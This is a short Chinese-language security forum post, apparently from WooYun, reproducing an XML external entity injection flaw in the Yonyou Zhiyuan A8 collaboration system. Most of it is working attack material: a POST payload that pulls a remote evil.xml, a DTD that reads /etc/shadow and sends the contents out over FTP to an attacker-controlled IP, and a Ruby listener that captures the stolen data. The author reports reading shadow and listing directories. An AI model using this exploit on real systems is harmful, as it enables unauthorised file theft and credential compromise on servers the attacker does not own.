|
看到大表哥,发了这篇洞,
WooYun: 用友致远A8协同系统XML实体注入漏洞
详情只有截图,看来只能靠自己了
采用的是利用ftp协议来进行数据传输,jdk1.6和jdk1.7均测试成功
Post 包
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip/evil.xml">
%remote;]>
<root/>
[/url]
放服务器上的Evil.xml
<!ENTITY % file SYSTEM "file:///etc/shadow">
<!ENTITY % int "<!ENTITY % send SYSTEM 'ftp://ip:33/%file;'>">
%int;
%send;
服务器监听,接收来自33端口的ftp信息
Ruby ftp.rb
require 'socket'
server = TCPServer.new 33
loop do
Thread.start(server.accept) do |client|
puts "New client connected"
data = ""
client.puts("220 xxe-ftp-server")
loop {
req = client.gets()
puts "< "+req
if req.include? "USER"
client.puts("331 password please - version check")
else
#puts "> 230 more data please!"
client.puts("230 more data please!")
end
}
end
end
效果图
运气好直接可读shadow文件
[url=http://static.wooyun.org/upload/image/201604/2016041711432766989.png]
对于有< % > 的文件还是读不了。忧伤
列目录
[url=http://static.wooyun.org/upload/image/201604/2016041711435286993.png][/url]
|
|